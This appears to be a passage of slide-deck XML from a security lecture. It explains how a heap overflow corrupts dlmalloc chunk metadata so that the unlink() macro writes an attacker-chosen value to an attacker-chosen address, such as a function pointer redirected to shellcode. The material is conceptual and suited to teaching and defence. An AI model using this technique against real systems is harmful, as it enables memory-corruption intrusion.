            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    BK = FD-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = BK; P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = FD; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  FD-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = BK-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = P; 		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="917596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1896" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>macro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1061897" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A heap overflow modifies in-memory management tags to trick </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dlmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into overwriting addresses chosen by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>macro:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwrite an arbitrary memory position with arbitrary integer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwrite address stored in FD + 12 (offset of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) with BK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>BK = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>FD = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>FD-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = BK; // *(P-&gt;fd+12) = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>BK-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = FD; // *(P-&gt;bk+8) = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwrite a function pointer with address of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When function is later invoked, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is executed instead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1590028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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>macro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1084419" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerable program allocates two adjacent memory chunks, named X and Y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When chunk X is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>overflowed, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>two fake (free) chunks are created over Y, called W and Z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When X is freed, it will be merged with W  and the unlink() macro will be called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since W and Z are under the attacker’s control, arbitrary values can be specified </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="666379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42" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>macro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085444" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="2171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5445" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="2400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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085446" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="2628900"/>
            <a:ext cx="2362200" cy="6858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5447" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3314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5448" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3543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PREV_INUSE=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085452" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3771900"/>
            <a:ext cx="2362200" cy="19431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5454" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2571751"/>
            <a:ext cx="745066"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X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085460" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304801" y="4400551"/>
            <a:ext cx="743037"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Y</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085461" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="2171700"/>
            <a:ext cx="76200" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16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5462" name="AutoShape 22"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="3371850"/>
            <a:ext cx="76200" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 341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5463" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2171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5464" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2400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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085465" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2628900"/>
            <a:ext cx="2362200" cy="6858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5466" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3314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5467" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3543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PREV_INUSE=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085469" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="2571751"/>
            <a:ext cx="745066"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X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085470" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648201" y="3714751"/>
            <a:ext cx="788873"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W</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085471" name="AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="2171700"/>
            <a:ext cx="76200" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16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5472" name="AutoShape 32"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="3371850"/>
            <a:ext cx="76200" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11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5473" name="Rectangle 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37719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fd_w</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085474" name="Rectangle 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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bk_w</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085475" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42291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of W</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085476" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="4457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PREV_INUSE=0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085477" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="4686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fd_z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085478" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="49149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bk_z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085479" name="AutoShape 39"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="4286250"/>
            <a:ext cx="76200" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11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5480" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724401" y="4514851"/>
            <a:ext cx="742962" cy="276999"/>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latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk Z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="645061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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>macro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086467" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2171700"/>
            <a:ext cx="4267200" cy="3486150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>free(X) is called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>W is examined and Z is found using (W + W-&gt;size)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Z says that W is free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>unlink(W, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>fd_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bk_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) is called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fd_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + 12) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bk_w</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>*(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bk_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> + 8) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>fd_w</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>fd_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> is set to the address to be overwritten - 12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bk_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> is set to the value to be written</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086469" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
